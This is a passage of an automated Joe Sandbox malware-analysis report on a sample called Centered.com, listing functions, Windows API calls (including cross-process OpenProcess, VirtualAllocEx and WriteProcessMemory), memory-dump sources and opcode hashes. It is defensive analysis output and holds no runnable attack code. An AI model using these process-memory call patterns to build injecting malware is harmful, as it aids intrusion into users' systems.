                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4582bec01da7e2b7bc2d2af40cbeae31ec6df843513ac7367bc44e3431ef03b7
                                                                                                                                                                                                                                                                                        • Instruction ID: 1d7246feea13104673fd8224d01b73b533e131f5c5e99b4c1d15ab8470f5e48d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4582bec01da7e2b7bc2d2af40cbeae31ec6df843513ac7367bc44e3431ef03b7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46F0FE748031289B9782AF74FD82C497B66FB647717050A1BF514D72B5C7360901BFD4
                                                                                                                                                                                                                                                                                        Function 00F312B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$_free
                                                                                                                                                                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                        • Opcode ID: 1be17da7488012a2e49faf9f762b8964ac2ba1961c0fd8da2e587389aad53e07
                                                                                                                                                                                                                                                                                        • Instruction ID: 4d9c0b76d0136f9e19a8384b499f89d4e1c73a7fee22bf4af0fb114e84292ff8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1be17da7488012a2e49faf9f762b8964ac2ba1961c0fd8da2e587389aad53e07
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7D10272D10206DBCB24DFA8C8567FAB7B1FF05730F28415AE9029B250D7359D80EBA1
                                                                                                                                                                                                                                                                                        Function 00F63063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F62B1D,?,?,00000034,00000800,?,00000034), ref: 00F6BDF4
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F630AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F62B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00F6BDBF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00F6BD1C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F62AE1,00000034,?,?,00001004,00000000,00000000), ref: 00F6BD2C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F62AE1,00000034,?,?,00001004,00000000,00000000), ref: 00F6BD42
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F6311A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F63167
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: 905ceb6c374e81d2a863a77a6fb8e92557b98e7cc11fd636eb44a269e18aa076
                                                                                                                                                                                                                                                                                        • Instruction ID: 5a9bfeaf700e1917075baf34e886fa5ab513f2a875b24355d793d55ea0242bf1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 905ceb6c374e81d2a863a77a6fb8e92557b98e7cc11fd636eb44a269e18aa076
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E411972D00218BEDB10DBA4CD85ADEBBB8EF49710F104095FA45BB181DB746F85EB61
                                                                                                                                                                                                                                                                                        Function 00F31A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\322891\Centered.com,00000104), ref: 00F31AD9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F31BA4
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F31BAE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                        • API String ID: 2506810119-3825628454
                                                                                                                                                                                                                                                                                        • Opcode ID: ecd2684027736ad3cdfd7f722c81002e3e6c7a1c5c0b2dd8fba36829e61e8f9d
                                                                                                                                                                                                                                                                                        • Instruction ID: 316e86fedd3c68185de1a9d71268e9974f15e4163ce042ea6f2d412f58d56b7d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecd2684027736ad3cdfd7f722c81002e3e6c7a1c5c0b2dd8fba36829e61e8f9d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49316C71E05218ABDB21DB99DC85D9EFBBCFB95770F1041AAF80497221E6748E40EB90
                                                                                                                                                                                                                                                                                        Function 00F6CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F6CBB1
                                                                                                                                                                                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00F6CBF7
                                                                                                                                                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FD29C0,016E5460), ref: 00F6CC40
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 5c959c5a7190be90315057a7da97e319211b49fa3da01f068b22fe304c4ca47f
                                                                                                                                                                                                                                                                                        • Instruction ID: bbbde58ac8230baabfc602d04baf5ee85970c8d25dff14d1f18c6c2cdaa33aec
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c959c5a7190be90315057a7da97e319211b49fa3da01f068b22fe304c4ca47f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F941B1316043429FDB20DF24DD85F2ABBE8AF84724F14461EF5E997291D734E904EB92
                                                                                                                                                                                                                                                                                        Function 00F94EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F9DCD0,00000000,?,?,?,?), ref: 00F94F48
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32 ref: 00F94F65
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F94F75
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Long
                                                                                                                                                                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                        • Opcode ID: ee523e2e97cf4c3bf26c6c7c588d4a4396ca2c3e5b4520242be3ed45f5dc932d
                                                                                                                                                                                                                                                                                        • Instruction ID: 553fb923a9cba1a0b1d34f02951f7b9ac29f9e574ca6899e65c13852e70a015a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee523e2e97cf4c3bf26c6c7c588d4a4396ca2c3e5b4520242be3ed45f5dc932d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81318B3161420AAFEF209F78CC45FEA77A9EB18378F204715F979A31E0D774A851AB50
                                                                                                                                                                                                                                                                                        Function 00F83AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F83AD4,?,?), ref: 00F83DD5
                                                                                                                                                                                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F83AD7
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F83AF8
                                                                                                                                                                                                                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00F83B63
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                        • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                        • Opcode ID: f53e321a671a86fcc5655af898da04e66ea9493aeae06855e48b6dd6810a1f02
                                                                                                                                                                                                                                                                                        • Instruction ID: 07a85e18c9f24461d3b194816fdde4b9ac0fde89b1bf0225d4a8785e1ebed80b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f53e321a671a86fcc5655af898da04e66ea9493aeae06855e48b6dd6810a1f02
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8831F5756002019FCB10EF28C9C5EE977E0EF94724F248159E8168B3B2D771EE41EB60
                                                                                                                                                                                                                                                                                        Function 00F94954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F949DC
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F949F0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F94A14
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                        • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                        • Opcode ID: af9e96267f829c53f96d41771d066eafafb799b834cd697a04a10e3da52e3a6b
                                                                                                                                                                                                                                                                                        • Instruction ID: 07637e1511a2d5b626ea7a136244bf0f5cd6446077648b15c02cd5b36d1f9d7b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af9e96267f829c53f96d41771d066eafafb799b834cd697a04a10e3da52e3a6b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F21BF32A10219ABEF158F94CC42FEB3B69EF48728F110214FA156B1D0D6B5F856EB90
                                                                                                                                                                                                                                                                                        Function 00F950F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F951A3
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F951B1
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F951B8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                        • Opcode ID: b2594b5f188fecaf2e57ceffe9bcbe972f5ecad6c926a00df4c8633fe11b55f3
                                                                                                                                                                                                                                                                                        • Instruction ID: 9571d5ee67b96d446d65822db1665ab8f5ed1040b47054d28d3801820e86df59
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2594b5f188fecaf2e57ceffe9bcbe972f5ecad6c926a00df4c8633fe11b55f3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1521B6B5600609AFEB11DF64DC81EB737ADEF597A4B140059F900973A1CB30EC41EBA0
                                                                                                                                                                                                                                                                                        Function 00F94253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F942DC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F942EC
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F94312
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                        • String ID: Listbox
                                                                                                                                                                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                        • Opcode ID: 61cf0e4f799879f9a9eb0d01262b6e3dbbe984b210794b98657f4206fd5a252c
                                                                                                                                                                                                                                                                                        • Instruction ID: 635af7b64b3712a773c7f74c376fb0e56526dbe16e2f8041a1f59f4eeff6f1be
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61cf0e4f799879f9a9eb0d01262b6e3dbbe984b210794b98657f4206fd5a252c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92219232A10218BBEF118FA4CC85FBB376EEF99764F118115F9019B190C671EC52ABA0
                                                                                                                                                                                                                                                                                        Function 00F75439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F7544D
                                                                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F754A1
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,00F9DCD0), ref: 00F75515
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                        • String ID: %lu
                                                                                                                                                                                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                        • Opcode ID: c6ec945a5a1036f2501a2f5a7d2646667f7e94eeb7a0cde33e4c4ce8d8327bb2
                                                                                                                                                                                                                                                                                        • Instruction ID: df608488686778830e47e6e7b36680d9b4c0851d7274e4c6e6056eab7786b8ae
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6ec945a5a1036f2501a2f5a7d2646667f7e94eeb7a0cde33e4c4ce8d8327bb2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1318571A00209AFDB10DF64CD85EAA77F8EF05318F1480A5F809DB262DB75EE45EB61
                                                                                                                                                                                                                                                                                        Function 00F94C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F94CED
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F94D02
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F94D0F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-1010561917
